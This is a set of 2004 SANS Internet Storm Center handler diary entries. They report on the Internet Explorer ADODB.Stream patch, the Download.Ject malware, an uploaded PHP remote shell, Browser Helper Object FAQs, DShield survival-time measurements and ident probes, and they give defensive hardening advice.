Yesterday Microsoft released a patch for IE. We have received a report that one user has a problem after the patch is applied, resulting IE no longer has a URL field. Since the patch will just turn off the ADODB.Stream ActiveX Control, we do not see any problem if the patch is applied. However, if you do have, let us know the issue. If you wish to disable the ADODB.Stream object from Internet Explorer manually, you can refer to Microsoft Knowledge Base Article 870669:



We received a report from Jon that he discovered someone has uploaded a php script into his website (his website allows people to upload photographs). From the php script description, it allows one to have a remote shell wrap in php to execute command on the server. Fortunately, the server has been configured to prevent people from running scripts. This highlights the importance of ensuring your server is configured and hardened properly. Patching can only fix the vulnerability but does not necessary mean your system is fully secured. Proper configuration and hardening are still necessary to protect your system. Of course don't forget to review your logs regularly to detect any suspicious attempts.

We also received a report from Susan that they are seeing attacks which appear to be a dictionary attack with a user name of "asdf" on their small server boxes. From the submission and doing a search (thanks to Patrick), we found Trend has a report on a worm WORM_DANSH.A which may explain the cause. If you see similar attacks, do let us know.



Published: 2004-07-02

MS Responds to IE Vulnerabilites With Patch

Internet Explorer Patch

Today's big news revolves around Microsoft releasing an out-of-cycle fix for the vulnerabilities recently exploited by the Download.Ject malware (among others).

This patch will turn off the ADODB.Stream ActiveX Control, which has been used
in conjunction with last weeks russian web site defacements to install malware
on unsuspecting user's PCs. Given the urgency demonstrated by last weeks exploits, Microsoft release this patch ahead of its next "Patch Day" (July 13th). However, as demonstrated by the proof of concept code below, even after 'ADODB.Stream' is disabled, it is still possible to launch programs on the
users system without user interaction.

(Note: We verified the link and the proof of concept code appears harmless.
It will open a cmd.exe shell and wait for the user to press a key. However,
we do have no control over the exploit site and the code may change at any

The underlying issue was first made public on Bugtraq about 10 month ago.

If you are using Microsoft Internet Explorer to browse the Internet, it
is suggested that you set the security level for your 'Internet Zone'
to high. This will disable the functions that lead to the exploit. However,
it will also disable windows update, unless you add the windows update
server to your list of secure sites.

Other tips:

* Be very picky about adding sites
to your set of secure sites. While the administrator may be well intended,
the russian web defacements showed that even regular sites can harbor
malicious code.

* Do not follow links to untrusted sites and be careful
in inspecting links sent to you via email.

* Run an up to date virus scanner. Not a 100% fix given the rapid deployment of malware, but it may help.

* Run a firewall with tight outbound traffic control. This will not fix the initial infection, but it may prevent a trojan from calling home and downloading additional components. It will also alert you of the malware once it attempts to call home.

Continuing MSIE exploit reports

Additionally, the ISC is continuing to receive numerous reports of malware compromising systems via Internet Explorer vulnerabilities. If you experience this (especially post-patch) please submit the relevant information for dissection by our malware analysis group.

Relevant links:

Download.Ject referenced here:

http://isc.incidents.org/diary.php?date=2004-06-24 )
The Microsoft press release:

BugTraq References

SANSFIRE: Hug^H^H^H Meet an ISC Handler

In case you've missed the banner hovering above this text, SANSFIRE 2004 begins this upcoming Tuesday in Monterey, California. Many of the ISC's handlers will be in attendance, so be sure to stop by the and say hello. Handlers expected to be present include Marc Sachs, Johannes Ullrich, Ed Skoudis, Lenny Zeltser, Toby Kohlenberg, Pedro Bueno, Mike Poor, and last and certainly least, yours truly, Cory Altheide. The IPNET is the official handlers' pen, but handlers can usually be found in the proximity of any bar with WiFi access.

See you next week!


Cory Altheide

Handler on Duty


Published: 2004-07-01

BHO FAQ, Survival Time, and auth/ident activity

Update (July 2nd 4 pm JU)

We are just following a thread on a public discussion group
that indicates that the Windows configuration patch released
today may not be sufficient. More later.

Update (July 2nd 10 am, JU)

Microsoft may release a patch/configuration change for the recent
Internet Explorer update. Please check Microsoft Update. This
fix is already available via the Microsoft Download Center.

Update: brief .org outage

Several sources reported an outage of the .org name servers earlier
this evening (around 9pm EST, 1am UTC). The issue appears to be
resolved now. No further information is available at this time.


There have been many questions coming in about Browser Helper Objects.
Firstly, we would like to reiterate that BHO’s are not all necessarily bad. “BHOs are a valid and useful feature to allow third party software to extend the browser. In cases we have observed, the problem is not the fact that the browser provides for BHOs, but the fact that it was possible to download and install the BHO without the users knowledge. Actual bugs in MSIE can be used to download and install the BHOs without user consent.” (Johannes Ullrich)

Q: Are BHO’s detectable by AV scanners?

A: “Browser Helper Objects can be detected by AV scanners, if the AV scanner's signature file includes a signature for the particular BHO. Given that some of these BHO's are distributed to only a small group of victims, it is possible that your particular AV software will not detect it. A better choice is to periodically review your BHOs using the BHO-Daemon tool (available at http://www.definitivesolutions.com. ) Windows XP SP2, which should be released soon, will include such a tool.” (JH) Also The BHO investigated in Tom Liston's recent report was given to AV vendors prior to the report's release. Currently it is being called "Trojan.Spy.Small.AA", "PWS.Banker.C.Trojan", "PWS-WebMoney.gen", and "bankhook.a".

Q: Is IE the only browser at risk?

A: “While 'BHO' is a concept unique to IE, other browsers provide similar mechanisms to allow third party software to be integrated into the browser. At this point, we have only observed BHO's written specifically for MSIE.” (JH)
“Mozilla based variants have "extensions", and all other browsers have a means to extend their functionality.

The issue under IE is that BHOs can be silently installed and there is no good way within IE to see what BHOs are on your machine.” (Tom Liston)

Q: Is XP the only target?

A: Reports indicate that XP is the only target of the recent example, but BHO’s are supported on earlier versions of windows (see Donald Smith’s RegEdits below.)

Handler Donald Smith has provided some handy registry locations:

On win98 there is a registration key for BHOs

Helper Objects

On Windows XP is a key that can be used to disable them:

My Computer\HKEY_LOCAL_MACHINE\Software\Microsoft\Internet

Survival Time

Dshield.org is now tracking a number known as “Survival Time.” It is the computed “average time between firewall hits as reported by [their] submitters, for an average target.” There was some debate on the handlers list on if this calculated time was too short. I set up a little experiment with a sensor on a cable modem provider and found after 15 minutes mydoom and bagel had probed the IP, and sasser had hit at 20 minutes.

The sensor also picked up quite a few probes to TCP/113 the auth/ident service port. There is a rise in scanning sources reported on Dshield, and a few reports have come in to the handler’s list. I was able to capture the traffic and it was in the form of “1026 , 25.” Where the first number was a 4-digit number while the 25 was fixed. A quick read of RFC1413 indicates that these are ident requests from a server in response to a connection from my sensor’s IP (source port being the 4-digit number) to their port 25 (SMTP.) Since my sensor didn’t send out any connections, it appears that these SMTP connections are spoofed.


Kevin Liston